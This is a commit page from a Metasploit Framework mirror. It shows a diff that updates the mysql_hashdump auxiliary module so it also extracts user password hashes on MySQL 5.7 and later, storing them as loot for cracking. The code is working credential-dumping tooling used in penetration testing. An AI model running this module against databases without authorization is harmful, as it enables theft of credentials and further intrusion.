infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #9525, Update mysql_hashdump for MySQL 5.7 and above

MS-2855/keylogger-mettle-extension
Brent Cook 2018-02-08 13:56:26 -06:00
parent c642d420c2 1bb5499fce
commit 44b08feeb0
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
1 changed files with 54 additions and 53 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

107
modules/auxiliary/scanner/mysql/mysql_hashdump.rb
View File

@ -12,10 +12,10 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'MYSQL Password Hashdump',
'Description' => %Q{
'Description' => %(
This module extracts the usernames and encrypted password
hashes from a MySQL server and stores them for later cracking.
},
),
'Author' => ['theLightCosine'],
'License' => MSF_LICENSE
)
@ -23,48 +23,10 @@ class MetasploitModule < Msf::Auxiliary
def run_host(ip)
if (not mysql_login_datastore)
return
end
return unless mysql_login_datastore
service_data = {
address: ip,
port: rport,
service_name: 'mysql',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
private_data: datastore['PASSWORD'],
private_type: :password,
username: datastore['USERNAME']
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}
login_data.merge!(service_data)
create_credential_login(login_data)
#Grabs the username and password hashes and stores them as loot
res = mysql_query("SELECT user,password from mysql.user")
if res.nil?
print_error("There was an error reading the MySQL User Table")
return
end
service_data = {
address: ::Rex::Socket.getaddress(rhost,true),
address: ip,
port: rport,
service_name: 'mysql',
protocol: 'tcp',
@ -72,10 +34,54 @@ class MetasploitModule < Msf::Auxiliary
}
credential_data = {
origin_type: :service,
jtr_format: 'mysql,mysql-sha1',
module_fullname: self.fullname,
private_type: :nonreplayable_hash
module_fullname: self.fullname,
origin_type: :service,
private_data: datastore['PASSWORD'],
private_type: :password,
username: datastore['USERNAME']
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}
login_data.merge!(service_data)
create_credential_login(login_data)
# Grab the username and password hashes and store them as loot
version = mysql_get_variable("@@version")
# Starting from MySQL 5.7, the 'password' column was changed to 'authentication_string'.
if version[0..2].to_f > 5.6
res = mysql_query("SELECT user,authentication_string from mysql.user")
else
res = mysql_query("SELECT user,password from mysql.user")
end
if res.nil?
print_error("There was an error reading the MySQL User Table")
return
end
service_data = {
address: ::Rex::Socket.getaddress(rhost, true),
port: rport,
service_name: 'mysql',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
jtr_format: 'mysql,mysql-sha1',
module_fullname: self.fullname,
private_type: :nonreplayable_hash
}
credential_data.merge!(service_data)
@ -87,17 +93,12 @@ class MetasploitModule < Msf::Auxiliary
print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end
end
end